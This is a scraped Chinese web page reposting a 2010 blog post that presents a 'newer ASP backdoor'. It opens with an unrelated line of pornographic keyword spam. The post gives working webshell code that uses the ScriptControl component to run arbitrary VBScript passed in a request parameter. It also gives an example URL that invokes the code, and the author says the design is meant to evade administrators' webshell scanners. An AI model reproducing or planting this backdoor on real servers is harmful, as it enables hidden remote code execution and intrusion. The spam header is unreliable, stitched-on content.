欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

一個較新的ASP后門服務(wù)端實現(xiàn)代碼

 更新時間:2010年10月11日 01:17:53   作者:  
一直很奇怪,為什么客戶端里面不是eval,就是execute,不管我藏哪里,管理員用個什么XX webshell掃描器,就能踢我屁股了。
今天重新研究了下VB里面的ScriptControl組件,發(fā)現(xiàn)asp里面也能調(diào)用。研究了下方法,后來和lcx討論了下。得到了如下代碼,在此感謝前輩的指點,呵呵。

代碼很簡單,我就不多做解釋了,以免有人罵我裝。

復制代碼 代碼如下:

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '參數(shù)SubCode作為過程代碼
o.run "e",Server,Response,Request,Application,Session,Error '參數(shù)名e 調(diào)用之,同時壓入6個基對象作為參數(shù)

'調(diào)用示例:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
%>


注意,雖然能用了,但是實驗發(fā)現(xiàn)只有l(wèi)ake2客戶端能用。希望有牛人出來改得通用一點。呵呵。自己寫個客戶端專用也不錯。


轉(zhuǎn)自:http://hi.baidu.com/ylbhz/blog

相關(guān)文章

最新評論